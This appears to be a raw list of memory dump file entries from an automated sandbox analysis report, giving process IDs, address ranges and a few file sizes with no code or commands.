memory/376-141-0x0000000000000000-mapping.dmp
-
memory/396-144-0x0000000000000000-mapping.dmp
-
memory/520-142-0x0000000000000000-mapping.dmp
-
memory/1132-158-0x0000000000000000-mapping.dmp
-
memory/1284-176-0x0000000000000000-mapping.dmp
-
memory/1528-145-0x0000000000000000-mapping.dmp
-
memory/1612-150-0x0000000000000000-mapping.dmp
-
memory/2212-139-0x00007FF8D6ED0000-0x00007FF8D7991000-memory.dmp
Filesize: 10.8MB
-
memory/2212-133-0x0000000000520000-0x000000000052C000-memory.dmp
Filesize: 48KB
-
memory/2212-130-0x0000000000000000-mapping.dmp
-
memory/2792-135-0x0000000000000000-mapping.dmp
-
memory/3000-159-0x0000000000000000-mapping.dmp
-
memory/3416-178-0x0000000000000000-mapping.dmp
-
memory/3784-147-0x0000000000000000-mapping.dmp
-
memory/3828-137-0x0000000000000000-mapping.dmp
-
memory/3944-138-0x0000000000000000-mapping.dmp
-
memory/4016-183-0x0000000000000000-mapping.dmp
-
memory/4156-171-0x0000000000000000-mapping.dmp
-
memory/4340-140-0x0000000000000000-mapping.dmp
-
memory/4348-153-0x0000000000000000-mapping.dmp
-
memory/4352-148-0x0000000000000000-mapping.dmp
-
memory/4388-187-0x0000000000000000-mapping.dmp
-
memory/4420-146-0x0000000000000000-mapping.dmp
-
memory/4464-185-0x0000000000000000-mapping.dmp
-
memory/4624-164-0x0000000000000000-mapping.dmp
-
memory/4680-186-0x0000000000000000-mapping.dmp
-
memory/4972-174-0x0000000000000000-mapping.dmp
-
memory/5068-167-0x0000000000000000-mapping.dmp
-
memory/5072-134-0x0000000000000000-mapping.dmp
-
memory/5344-189-0x0000000000000000-mapping.dmp
-
memory/5360-190-0x0000000000000000-mapping.dmp
-
memory/5456-192-0x0000000000000000-mapping.dmp
-
memory/5596-194-0x0000000000000000-mapping.dmp